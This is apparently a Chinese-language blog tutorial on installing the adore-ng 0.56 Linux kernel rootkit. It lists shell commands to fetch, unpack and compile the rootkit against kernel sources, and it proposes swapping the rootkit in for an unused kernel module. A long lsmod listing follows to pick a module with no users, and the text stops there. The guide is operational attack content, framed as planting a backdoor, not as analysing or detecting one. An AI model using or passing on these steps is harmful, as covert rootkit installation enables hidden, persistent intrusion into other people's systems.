Linux内核级后门Adore

#wget         下载
#unzip adore-ng-0.56.zip        解压
#cd adore-ng-0.56
#cp Makefile.2.6 Makefile        使用2.6内核的Makefile
#make        编译
提示没有/usr/src/linux目录
#vi Makefile        查看一下发现是需要内核源码

挂载光盘以后安装kernel-devel包，或者直接yum -y install kernel-devel
#rpm -ivh kernel-devel-2.6.18-128.el5.i686.rpm
#ln -s /usr/src/kernels/2.6.18-128.el5-i686/ /usr/src/linux       创建软连结
#make        从新编译adore
替换不用的内核模块为我们rootkit的模块
#lsmod        看下used by 为0的
Module                  Size  Used by
nls_utf8                6209  1
autofs4                24261  2
hidp                   23105  2
rfcomm                 42457  0
l2cap                  29505  10 hidp,rfcomm
bluetooth              53797  5 hidp,rfcomm,l2cap
sunrpc                144765  1
ipt_REJECT              9537  0
ip6t_REJECT             9409  1
xt_tcpudp               7105  6
ip6table_filter         6849  1
ip6_tables             18053  1 ip6table_filter
x_tables               17349  4 ipt_REJECT,ip6t_REJECT,xt_tcpudp,ip6_tables
dm_mirror              23109  0
dm_multipath           24013  0
scsi_dh                11713  1 dm_multipath
video                  21193  0
hwmon                   7365  0
backlight              10049  1 video
sbs                    18533  0
i2c_ec                  9025  1 sbs
button                 10705  0
battery                13637  0
asus_acpi              19289  0
ac                      9157  0
ipv6                  261473  17 ip6t_REJECT
xfrm_nalgo             13381  1 ipv6
crypto_api             12609  1 xfrm_nalgo
lp                     15849  0
snd_ens1371            28513  0
gameport               18633  1 snd_ens1371
snd_rawmidi            26561  1 snd_ens1371
snd_ac97_codec         93025  1 snd_ens1371
ac97_bus                6337  1 snd_ac97_codec
snd_seq_dummy           7877  0
snd_seq_oss            32577  0
pcspkr                  7105  0
snd_seq_midi_event     11073  1 snd_seq_oss
snd_seq                49585  5 snd_seq_dummy,snd_seq_oss,snd_seq_midi_event
floppy                 57125  0
sg                     36189  0
snd_seq_device         11725  4 snd_rawmidi,snd_seq_dummy,snd_seq_oss,snd_seq
snd_pcm_oss            42817  0
snd_mixer_oss          19009  1 snd_pcm_oss
snd_pcm                72133  3 snd_ens1371,snd_ac97_codec,snd_pcm_oss
snd_timer              24517  2 snd_seq,snd_pcm
snd                    55237  10 snd_ens1371,snd_rawmidi,snd_ac97_codec,snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer
soundcore              11553  1 snd
pcnet32                35269  0
mii                     9409  1 pcnet32
i2c_piix4              12237  0
snd_page_alloc         14281  1 snd_pcm
i2c_core               23745  2 i2c_ec,i2c_piix4
ide_cd                 40161  1
serio_raw              10693  0
cdrom                  36577  1 ide_cd
parport_pc             29157  1
parport                37513  2 lp,parport_pc
dm_raid45              66509  0
dm_message              6977  1 dm_raid45
dm_region_hash         15681  1 dm_raid45
dm_log                 14529  3 dm_mirror,dm_raid45,dm_region_hash
dm_mod                 62201  4 dm_mirror,dm_multipath,dm_raid45,dm_log
dm_mem_cache            9537  1 dm_raid45
ata_piix               23621  0
libata                156677  1 ata_piix
mptspi                 23625  3
mptscsih               36929  1 mptspi
mptbase                76901  2 mptspi,mptscsih
scsi_transport_spi     26305  1 mptspi
sd_mod                 25153  4
scsi_mod              141589  7 scsi_dh,sg,libata,mptspi,mptscsih,scsi_transport_spi,sd_mod
ext3                  124233  2
jbd                    56937  1 ext3
uhci_hcd               25421  0
ohci_hcd               24681  0
ehci_hcd               33357  0